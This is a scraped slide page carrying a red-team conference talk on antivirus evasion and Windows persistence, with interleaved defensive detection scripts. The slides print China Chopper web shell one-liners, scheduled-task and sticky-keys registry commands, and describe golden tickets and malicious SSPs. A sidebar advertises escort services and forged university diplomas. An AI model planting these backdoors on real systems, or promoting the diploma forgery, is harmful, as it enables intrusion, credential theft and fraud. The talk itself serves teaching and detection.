定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Paul Calvano
 

Dernier (20)

Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
Call Girls In The Ocean Pearl Retreat Hotel New Delhi 9873777170
 
Q4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptxQ4-1-Illustrating-Hypothesis-Testing.pptx
Q4-1-Illustrating-Hypothesis-Testing.pptx
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
Call Girls South Delhi Delhi reach out to us at ☎ 9711199012
 
Intellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptxIntellectual property rightsand its types.pptx
Intellectual property rightsand its types.pptx
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 

The Supporting Role of Antivirus Evasion while Persisting

  • 1. The Supporting Role of Antivirus while Persisting @ChrisTruncer
  • 2. Christopher Truncer Previous Systems Administrator turned Red Teamer Red Team Lead at Mandiant Florida State Seminole Open Source Developer @ChrisTruncer
  • 3. What’s this talk about? ◉ How Stagers Work ◉ Case Study: Bypassing a Signature ◉ The Right Way to do Detection ◉ Persistence - lots of it! :) ◉ Old School and New School Techniques ◉ Persistence Detection ◉ Questions
  • 5. Antivirus Evasion ◉ White hats and attackers need to evade antivirus ◉ Evading to establish immediate C&C of a compromised system ◉ Also used to maintain access on a system/in a network
  • 6. Antivirus Evasion ◉ If required to use an executable, we’ll use a stager ◉ Stager - Veil-Evasion or MSFVenom output ◉ Inject shellcode into memory ◉ Shellcode will download and inject a reflective dll ◉ A “loader” for your real malware
  • 7. Stagers ◉ Stagers can be developed in any language that can interact with the Windows functions ◉ It’s not hard to write a stager ○ Just four function calls
  • 8. Stagers ◉ Allocate memory to store shellcode, and set the proper memory permissions ◉ Copy shellcode into the allocated memory ◉ Create a thread to execute the shellcode ◉ Have code wait until thread is done executing
  • 9. Stagers ◉ VirtualAlloc ◉ RtlMoveMemory ◉ CreateThread ◉ WaitForSingleObject
  • 11. AV’s Approach to Catching Malware
  • 12. Methods of Detection ◉ Signature Based ○ This is what Veil-Evasion targets ◉ Heuristics Based ◉ Crowd Sourced ○ Reputation Based
  • 13. Veil’s Approach to Bypassing AV
  • 14. Approaches to Bypassing AV ◉ Ghost code / net no-operation code ◉ Encrypted binaries ○ Hyperion ◉ Custom Code
  • 15. Veil’s Approach ◉ Fight on-disk detection through different techniques ○ Obfuscated code ○ Encrypted code ○ Non-standard languages for Windows binaries ■ Python, Ruby, Perl, etc. ○ Shellcode-less binaries
  • 16. Veil’s Approach ◉ Languages within Veil-Evasion ○ Python ○ Perl ○ PowerShell ○ C# ○ C ○ Go ○ Ruby
  • 17. Veil’s Approach ◉ Using a language that’s not C or C# made a large difference ○ AV programs didn’t know or couldn’t properly inspect non-standard languages ◉ Example: ○ C vs. Python
  • 20. Simply changing the language the code is written in completely bypassed all signatures.
  • 23. Veil Module ◉ Add a little complexity, so it isn’t just easily obvious what is happening ◉ What about encrypting the code? ◉ What about making the tool brute-force its own key?
  • 24. Stallion ◉ Generate a random encryption key, that is artificially constrained ○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567 ◉ Test for a known string with decryption key ○ If it doesn’t match, it’s the wrong key ○ If it matches, decrypt the shellcode and inject it into memory
  • 28. Signature Bypass ◉ After approximately one year, Veil had its first AV signature
  • 29. Signature Bypass ◉ I was excited to see if someone finally figured Veil-Evasion out ○ It is open source… ◉ Previous attempts have turned out fairly humorous
  • 40. Persistence Purposes ◉ Persistence is commonly used for one of two purposes: ○ Persisting on a host ○ Persisting on a network ◉ A lot of the techniques I will cover can facilitate access for both purposes
  • 41. Persisting Hosts ◉ When persisting a host, an attacker is looking for ad-hoc or programmatically defined access to a system ○ Attackers want this as close to on-demand as possible ◉ The attacker’s efforts are directed at maintaining access to a specific host
  • 42. Persisting Hosts ◉ What’s needed for persisting hosts? ○ Survive reboots ■ Probably the most important concept ○ Have administrative rights on the system ○ Complement network-based persistence
  • 43. Persisting Networks ◉ Network-based persistence in two contexts ○ Used to maintain access into a network ■ Similar to host-based persistence, but its purpose isn’t access to a host, but to the network ○ Used to maintain access into different networks ■ Don’t want to be VLANed off in a VOIP network
  • 44. Persisting Networks (continued) ◉ What other network-based persistence options are there? ○ Attackers can use persistence not only to maintain access to a network, but also to obtain their required domain permissions on-demand ○ Access is likely facilitated through a host-based persistence technique
  • 46. Web Shells ◉ Funny, this seems so trivial and easy that no one would ever use it… ◉ ...that’s not the case ○ China Chopper - APT17, APT19, APT22 ○ ITSecShell, reDuh, ASPShell ○ Even commodity code
  • 47. China Chopper ◉ Very tiny webshell, about 4kb stored server side ◉ Developed in a variety of languages ○ CFM ○ ASP ○ PHP ○ Etc. ◉ A client application is used to interact with the webshell
  • 48. China Chopper Server Code ◉ ASP ○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%> ◉ PHP ○ <?php @eval($_POST['password']);?> https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
  • 50. China Chopper ◉ Really useful features in China Chopper ○ File Explorer ○ Upload/Download files ○ Mod file timestamp attributes ○ Database client - MSSQL, MySQL ○ Command shell
  • 51. Web Shell Prevention & Detection ◉ Hunt/Sweep for known bad files ○ Hashes, or other file based indicators ◉ Blacklist all filetypes except expected files for upload functionality ◉ Don’t allow your web server to execute files uploaded from untrusted sources
  • 52. Magic Packet ◉ Or “how to access port 12345 with a packet to port 443” ◉ The attacker’s problem: ○ Compromised a web server (port 80 and 443 are in use) ○ Firewall(s) prevent connection to any other port ○ Wants a TCP backdoor to be remotely accessible ■ Can’t be bothered to write a webshell
  • 53. Magic Packet ◉ Run backdoor listening on port 12345 ◉ Run malware “low” in the network stack ○ Check incoming TCP SYN packets ○ When a SYN packet is received with a specific signature, change destination port from 443 to 12345 ○ Windows network stack then delivers the packet to port 12345 ○ Malware alters the port in all subsequent packets for the stream
  • 54. [Diagram: the attacker’s SYN to dport 443 carrying data=s3cr37 reaches the compromised system, where the malware rewrites it to dport 12345; the backdoor’s SYN/ACK from sport 12345 is rewritten back to sport 443 before it leaves the host.]
  • 55. Magic Packet - Defenses ◉ This malware was installed via a custom compiled executable ○ Application Whitelisting ○ Device Guard
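A sensor-side check for the magic packet technique on slides 52 to 54, added here as an example (not code from the talk): parse raw IPv4/TCP segments and alert on a SYN without ACK that carries payload, which is what the trigger packet looks like on the wire. The packets are constructed inline with struct; the port 443 and the s3cr37 trigger string come from the slides, the addresses, parser and alert format are assumptions.

```python
"""Detect TCP SYN segments that carry payload data (the magic-packet trigger).

Added example, not code from the talk. A pure SYN normally carries no data,
so a SYN whose payload is non-empty is a cheap, high-signal alert for the
technique above. Packets are constructed inline with struct; checksums are
left at zero because the parser never validates them.
"""
import struct
from dataclasses import dataclass

TCP_SYN = 0x02
TCP_PSH = 0x08
TCP_ACK = 0x10
IPPROTO_TCP = 6


@dataclass
class Segment:
    src: str
    dst: str
    sport: int
    dport: int
    flags: int
    payload: bytes


def parse_ipv4_tcp(packet: bytes) -> Segment:
    """Parse a raw IPv4 packet (no link-layer header) carrying TCP."""
    ihl = (packet[0] & 0x0F) * 4               # IPv4 header length in bytes
    total_len = struct.unpack("!H", packet[2:4])[0]
    if packet[9] != IPPROTO_TCP:
        raise ValueError("not a TCP packet")
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    tcp = packet[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[0:4])
    data_off = (tcp[12] >> 4) * 4              # TCP header length in bytes
    flags = tcp[13]
    return Segment(src, dst, sport, dport, flags, tcp[data_off:])


def is_syn_with_data(seg: Segment) -> bool:
    """True for a SYN (not SYN/ACK) that carries application data."""
    syn = bool(seg.flags & TCP_SYN)
    ack = bool(seg.flags & TCP_ACK)
    return syn and not ack and len(seg.payload) > 0


def scan(packets) -> list:
    """Return one alert line per SYN-with-data segment."""
    alerts = []
    for raw in packets:
        seg = parse_ipv4_tcp(raw)
        if is_syn_with_data(seg):
            alerts.append(
                f"ALERT {seg.src}:{seg.sport} -> {seg.dst}:{seg.dport} "
                f"SYN carries {len(seg.payload)} bytes: {seg.payload!r}"
            )
    return alerts


def build_packet(src, dst, sport, dport, flags, payload=b"") -> bytes:
    """Construct an IPv4+TCP packet for testing (checksums zeroed)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags,
                      65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64,
                     IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + tcp


def demo_traffic() -> list:
    """Constructed capture: a normal handshake plus one magic SYN to port 443."""
    return [
        build_packet("10.0.0.5", "192.0.2.10", 51000, 443, TCP_SYN),
        build_packet("192.0.2.10", "10.0.0.5", 443, 51000, TCP_SYN | TCP_ACK),
        build_packet("10.0.0.5", "192.0.2.10", 51000, 443, TCP_PSH | TCP_ACK,
                     b"GET / HTTP/1.1\r\n"),
        build_packet("198.51.100.7", "192.0.2.10", 40000, 443, TCP_SYN,
                     b"s3cr37"),
    ]


if __name__ == "__main__":
    for line in scan(demo_traffic()):
        print(line)
```

TCP Fast Open (RFC 7413) SYNs legitimately carry data, so whitelist hosts that negotiate it before turning this into a blocking rule.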
  • 56. Outlook ◉ Outlook rules can help provide a very unique on-demand foothold onto a host ◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system ◉ Provides access immediately when Outlook triggers the rule
  • 57. Outlook ◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received ◉ Attacker will sync the rule against the target user’s account ◉ Send an e-mail with the trigger in the subject ◉ Get shell :)
  • 60. Outlook - Additional Tweaks ◉ Have another rule auto-delete the incoming e-mail to prevent user detection of the trigger ○ https://silentbreaksecurity.com/malicious-outlook-rules/
  • 61. Outlook - Detection ◉ Honestly, not certain on the best means to detect this at scale ◉ Primary IOC is a rule that executes a program when receiving an e-mail ○ I don’t know of any legit use cases for this
  • 63. Registry Hacks ◉ This is the 101 method for persistence that almost everyone learns ◉ Extremely easy to set up, and can be installed with a range of permissions
  • 64. Registry Hacks ◉ These can be configured to run when the system starts, or a user logs into the system ○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ◉ These methods are highly publicized and well known. ◉ Defensive tools look for these
  • 65. Registry Hacks - Takeaway ◉ These can be good for maintaining initial access, but not for long term use ◉ SOCs - you want to have the ability to detect these
  • 66. Startup Folder ◉ Your system will execute files in the startup folder ○ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
  • 67. Scheduled Tasks ◉ Scheduled tasks are an easy way for a user of any level to persist on a system ◉ With the proper permissions, you can schedule a task up to the SYSTEM level ◉ This is Microsoft’s recommendation/alternative to using “at” jobs
  • 68. Scheduled Tasks ◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI ◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc. ◉ Tasks can run binaries, PowerShell one-liners, and more
  • 70. Scheduled Tasks ◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe ◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem
  • 71. Scheduled Tasks - Detection ◉ Obtain a baseline of the scheduled tasks set to run on your systems ○ Schtasks /query ○ Task scheduler ○ Etc. ◉ Audit systems and identify deviations from your baseline
  • 72. Service Manipulation ◉ Services usually run with SYSTEM level permissions, so can be juicy targets for attackers ◉ Easy way to install service based persistence? Check service binary write permissions!
  • 74. Service Manipulation ◉ Now that you’ve found services that can be modified, you just need a service binary. ○ Veil-Evasion, PowerUp, custom code ◉ Save the original service binary ◉ Bounce the box (or service) if required
  • 75. Sticky Keys ◉ With administrative access to a machine, you can easily set up sticky keys ○ Copy sethc.exe ○ Copy cmd.exe to C:\Windows\System32\sethc.exe ○ Reboot, and hit shift five times
  • 77. Sticky Keys - Another Method ◉ Set cmd.exe as the debugger for sethc.exe ◉ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
  • 78. Sticky Keys - Another Method ◉ Main problem - doesn’t require authentication ◉ If using Sticky Keys, ensure it’s calling back to a location you control, vs. opening up the system for everyone
  • 79. Sticky Keys - Detection ◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary ◉ Ensure no registry key is added defining a debugger for sethc.exe
  • 81. DLL Search Order Hijack ◉ DLL search order hijacking exploits how Windows searches for DLLs when loading an executable ◉ Specifically, it exploits the fact that Windows will always search the current folder of the executable for a DLL
  • 82. DLL Search Order Hijack ◉ Sample in CAPEC ○ If you drop ntshrui.dll within C:\Windows and run explorer.exe, you can get the DLL within C:\Windows to be executed ◉ This exploits the order in which the DLL is searched for on a Windows system
  • 83. DLL Search Order Hijack ◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system ◉ Since it’s every time the application runs, it can be used as a persistence technique ◉ PowerUp can be used to find these opportunities
  • 84. DLL Search Order Hijack ◉ Used by the following actors: ○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26 ◉ Used by the following malware: ○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
  • 85. Legitimate Scheduled Tasks ◉ Easy to identify scheduled tasks named “Evil task” ◉ First we must look at how investigators detect malicious scheduled tasks
  • 86. Legitimate Scheduled Tasks ◉ Stacking tasks across multiple systems to determine anomalous tasks ◉ Parse task scheduler log (schedLgu.txt)
  • 87. Legitimate Scheduled Tasks ◉ What if we modify existing legit scheduled tasks? ○ Specifically tasks that are not required for Windows functionality
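A baseline-and-stacking audit of scheduled tasks that covers both the detection slide (71) and the “Legitimate Scheduled Tasks” slides (85 to 87), added as an example rather than code from the talk: it flags tasks missing from a known-good baseline, legitimate tasks whose action was changed, and tasks present on only a few hosts. The CSV is constructed with a subset of the columns `schtasks /query /fo CSV /v` emits; host names are samples and the task and binary names are the slides’.

```python
"""Audit scheduled tasks against a baseline and stack them across hosts.

Added example, not code from the talk. Three checks from the slides:
  1. tasks that do not appear in a known-good baseline,
  2. baseline tasks whose "Task To Run" differs (a modified legit task),
  3. least-frequency stacking: tasks present on only a few hosts.
The CSV text is constructed here with a subset of the columns that
`schtasks /query /fo CSV /v` produces; hosts are sample names.
"""
import csv
import io

# Constructed known-good baseline taken from a clean image.
BASELINE_CSV = r'''"TaskName","Task To Run","Run As User"
"\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"\Microsoft\Windows\Time Synchronization\SynchronizeTime","%windir%\system32\sc.exe start w32time task_started","LOCAL SERVICE"
"\GoogleUpdateTaskMachineUA","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM"
'''

# Constructed output gathered from two hosts; WS02 has one new task and one
# legitimate task whose action was swapped for a binary in a user's Downloads.
CURRENT_CSV = r'''"HostName","TaskName","Task To Run","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS01","\Microsoft\Windows\Time Synchronization\SynchronizeTime","%windir%\system32\sc.exe start w32time task_started","LOCAL SERVICE"
"WS01","\GoogleUpdateTaskMachineUA","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM"
"WS02","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"WS02","\Microsoft\Windows\Time Synchronization\SynchronizeTime","c:\users\chris\downloads\safe.exe","LOCAL SERVICE"
"WS02","\GoogleUpdateTaskMachineUA","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM"
"WS02","\SysUpdate","c:\users\chris\downloads\safe.exe","chris"
'''


def load_tasks(csv_text: str) -> list:
    """Parse schtasks-style CSV into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def normalize(action: str) -> str:
    """Light normalization so case and whitespace differences do not cause noise."""
    return " ".join(action.strip().lower().split())


def baseline_deviations(baseline_rows, current_rows):
    """Return (new_tasks, modified_tasks).

    new_tasks:      [(host, task_name, action)]
    modified_tasks: [(host, task_name, baseline_action, current_action)]
    """
    expected = {r["TaskName"]: normalize(r["Task To Run"]) for r in baseline_rows}
    new_tasks, modified_tasks = [], []
    for r in current_rows:
        name, action = r["TaskName"], normalize(r["Task To Run"])
        if name not in expected:
            new_tasks.append((r["HostName"], name, r["Task To Run"]))
        elif action != expected[name]:
            modified_tasks.append((r["HostName"], name, expected[name], action))
    return new_tasks, modified_tasks


def stack_tasks(current_rows, max_hosts: int = 1) -> list:
    """Least-frequency stacking: task names seen on at most max_hosts hosts."""
    hosts_by_task = {}
    for r in current_rows:
        hosts_by_task.setdefault(r["TaskName"], set()).add(r["HostName"])
    rare = [(name, sorted(hosts)) for name, hosts in hosts_by_task.items()
            if len(hosts) <= max_hosts]
    return sorted(rare)


if __name__ == "__main__":
    current = load_tasks(CURRENT_CSV)
    new, modified = baseline_deviations(load_tasks(BASELINE_CSV), current)
    for host, name, action in new:
        print(f"NEW      {host} {name} -> {action}")
    for host, name, was, now in modified:
        print(f"MODIFIED {host} {name}: {was!r} -> {now!r}")
    for name, hosts in stack_tasks(current):
        print(f"RARE     {name} only on {', '.join(hosts)}")
```

Raise `max_hosts` to a small percentage of the fleet when stacking across hundreds of systems; the modified-task check is what catches the slide 87 trick of hiding inside a legitimate task name.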
  • 88. Unquoted Service Paths ◉ Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path ○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
  • 89. Unquoted Service Paths ◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe ○ C:\Program.exe ○ C:\Program Files(x86)\Steam\Steam.exe ○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe ◉ Three opportunities
  • 90. Unquoted Service Paths ◉ If we have write access to any of the paths that Windows looks for, we can hijack the service ○ Just need a service binary ◉ Drop it into any of the paths on the previous slide, and restart the service ○ Might need to wait for a reboot
  • 91. Unquoted Service Paths - Prevention ◉ Check service binaries on your images and determine if any are using unquoted service paths. ◉ Make sure the paths aren’t writable to non-admins. ◉ PowerUp can find these as well
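An audit helper for the unquoted service path check on slides 88 to 91, added as an example (not the talk’s or PowerUp’s code): it reproduces the search sequence shown on slide 89 for any unquoted ImagePath with spaces, so a defender can list exactly which directories’ ACLs to verify. The service table is a constructed sample; only the Steam path comes from the slides, the other entries and the function names are assumptions.

```python
"""Find unquoted service paths and the locations Windows would try first.

Added example, not code from the talk or from PowerUp. It reproduces the
search order walked through on the slides: for an unquoted ImagePath that
contains spaces, CreateProcess tries each space-delimited prefix (adding .exe
when the prefix has no extension) before it reaches the intended binary.
The service table below is a constructed sample of ImagePath values.
"""
import os
import re

# Constructed sample of HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath
# values. Only the first entry is taken from the slide.
SAMPLE_SERVICES = {
    "SteamGaming": r"C:\Program Files(x86)\Steam\Steam Gaming\steam.exe",
    "Spooler": r"%SystemRoot%\System32\spoolsv.exe",                       # no spaces: not affected
    "VendorQuoted": r'"C:\Program Files\Vendor Tool\tool.exe" -service',   # quoted: not affected
    "VendorUnquoted": r"C:\Program Files\Vendor Tool\tool.exe -service -verbose",
}

# Everything up to and including the first ".exe" token; the rest is arguments.
_EXE_TOKEN = re.compile(r"(.*?\.exe)(?:\s|$)", re.IGNORECASE)


def hijack_candidates(image_path: str) -> list:
    """Return the paths Windows would try, in order, for an unquoted ImagePath.

    An empty list means the path is quoted or has no spaces, so this class of
    hijack does not apply.
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    m = _EXE_TOKEN.match(path)
    exe = m.group(1) if m else path
    tokens = exe.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if not prefix.lower().endswith(".exe"):
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def audit_services(services: dict) -> dict:
    """Map each affected service name to its ordered hijack candidates."""
    findings = {}
    for name, image_path in services.items():
        candidates = hijack_candidates(image_path)
        if candidates:
            findings[name] = candidates
    return findings


def writable_parents(candidates: list) -> list:
    """Candidate paths whose parent directory the current user can write to.

    os.access is only a rough check against Windows ACLs; confirm with icacls
    before deciding a finding is exploitable or fixed.
    """
    return [c for c in candidates
            if os.path.isdir(os.path.dirname(c))
            and os.access(os.path.dirname(c), os.W_OK)]


if __name__ == "__main__":
    for name, candidates in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: unquoted path with spaces")
        for c in candidates:
            print(f"    would try {c}")
        for c in writable_parents(candidates):
            print(f"    WRITABLE parent: {os.path.dirname(c)}")
```

The fix is to quote the path in the service’s ImagePath (for example with sc config and a quoted binPath=); the candidate list tells you which directories must not be writable by non-admins in the meantime.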
  • 92. WMI Requirements ◉ Event Filter ◉ Event Consumer ◉ Filter/Consumer Binding
  • 93. WMI Requirements - Event Filter ◉ The WMI query that fires upon an event occurring ○ Usually, an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent
  • 94. WMI Requirements - Event Consumer ◉ There are five different event consumers ○ The most interesting one is “CommandLineEventConsumer” ◉ These “consume” or act on events that occur
  • 95. WMI Requirements - Filter/Consumer Binding ◉ This associates a WMI Event Filter with the Event Consumer
  • 96. WMI - Persistence ◉ PowerSploit’s persistence module for WMI ○ Automates the creation process ○ Will create a permanent WMI event subscription
  • 97. PowerShell Profiles ◉ Anytime PowerShell runs, it will execute code in the default profile ◉ Create profile code here: ○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
  • 98. PowerShell Profiles ◉ Use a standard persistence mechanism to execute PowerShell silently ○ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden ○ It’s a legit exe!
  • 99. PowerShell Profiles ◉ Example in profile.ps1: ○ iex("write-host 'hello world'")
  • 100. Security Support Provider ◉ A Security Support Provider (SSP) - a security package ○ An extension used to perform authentication during client/server exchange ◉ An Authentication Package (AP) ○ Extends interactive login authentication ○ Example: RSA tokens
  • 101. Security Support Provider ◉ SSP/AP ○ Can serve tasks of SSPs and APs - loaded into lsass at boot ○ Example: Kerberos and msv1_0 (NTLM)
  • 102. Security Support Provider ◉ Install your own SSP that is loaded into lsass.exe ◉ Can develop your own SSP DLL ◉ Use Persistence module in PowerSploit to install your malicious SSP
  • 103. Security Support Provider ◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll ○ Once installed and loaded into lsass.exe, it captures plaintext passwords
  • 106. Excel Magic ◉ Malicious macro executes backdoor ◉ How can you ensure persistence? ○ Most users will run Excel once a day ○ You can use any “old school” techniques to spawn Excel ○ Disable macro settings to run macro without user prompt
  • 107. Excel Magic ◉ Registry modification that opens a specific Workbook upon starting Excel ○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\Trusted Locations ○ Just add the location
  • 112. Golden Tickets ◉ Method was developed with Ben Delpy and Sean Metcalf ◉ Forges a “golden” Kerberos ticket which can be good for 10 years! ◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain
  • 113. Golden Tickets ◉ Only need four pieces of information ○ Domain SID ○ Name of the domain ○ User you want to create a ticket for ○ Krbtgt account hash ◉ You can build your ticket at home, offline
  • 117. Golden Ticket Takeaways ◉ If impersonating an account, tickets are still valid even if the password changes ◉ Valid for as long as you specify (10 year default) ◉ Domain trusts ○ Child domains can compromise the parent ◉ The only way to stop it is to change the krbtgt hash… twice… ◉ Or rebuild from bare metal
  • 118. Account Checkout - Case Study ◉ Client had account checkout system for domain administrator accounts ◉ Only two users with access to checkout system ◉ System requires 2FA ◉ DA access is lost if user changes their password/pin/token ◉ Users can see checked out accounts
  • 120. Account Checkout - Case Study ◉ Persist domain administrator without getting caught ○ Can’t continuously check out accounts ◉ Password vault permissions were managed through Active Directory groups ○ Tons of them
  • 121. Account Checkout - Case Study ◉ Copy group memberships to a compromised user account ○ User doesn’t use the Password Vault ■ All changes were documented ◉ This gave us all the permissions we needed without needing access to their Password Vault
  • 124. Conclusions ◉ Persistence will remain rampant ◉ Always new and creative ways to maintain persistence ◉ Understanding persistence techniques is critical to detecting attacker access